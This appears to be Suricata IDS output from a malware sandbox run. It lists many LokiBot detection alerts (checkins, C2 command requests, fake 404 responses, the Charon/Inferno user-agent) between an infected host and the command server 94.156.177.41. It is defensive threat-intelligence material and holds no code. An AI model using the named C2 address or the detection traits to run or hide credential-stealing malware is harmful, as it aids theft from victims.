                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49207 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49191 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49253 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49175
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49267 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49195
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49178 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49178 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49267
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49178 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49251 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49192
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49251 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49251 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49216 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49222
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49241 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49241 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49251 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49251 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49251
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49224 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49224 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49224 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49212 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49241 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49234 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49241 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49256 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49183 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49211
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49207 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49253 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49199 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49253 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49182 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49182 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49249 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49224 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49224 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49199 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49269 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49199 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49269 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49269 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49212 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49269 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49269 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49249 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49269
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49249 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49272 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49272 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49250 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49256 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49274 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49207 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49183 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49223 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49250 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49250 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49183 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49250
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49223
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49191
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49216 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49277 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49277 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49234 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49225 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49225 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49272 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49270 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49270 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49183 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49272 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49256
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49216
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49253
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49189
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49207
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49231 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49231 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49231 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49258 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49258 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49258 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49210 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49210 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49210 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49209 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49258 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49277 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49258 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49234 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49277 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49181
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49237
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49224
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49276
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49178 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49210 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49212
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49210 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49272 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49199
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49274 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49274 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49183 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49231 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49238 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49231 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49206 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49182 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49225 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49206 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49249
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49270 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49238 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49182 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49270 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49184 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49184 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49184 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49243
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49236 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49274
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49236 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49230 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49230 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49230 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49184 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49184 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49277 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49183
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49178 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49178
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49197 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49206
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49279 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49225 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49225 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49182 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49279 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49272
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49270 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49182
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49266 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49266 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49266 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49279
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49236 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49266 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49266 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49226 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49266
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49226 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49226 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49220 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49271 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49271 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49271 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49210
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49236 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49236 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49271 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49234 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49277
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49197 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49197 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49258
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49238 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49225
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49197 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49220 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49220 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49271 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49209 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49230 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49271
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49230 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49230
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49236
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49238 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49226 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49226 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49238 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49197 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49270
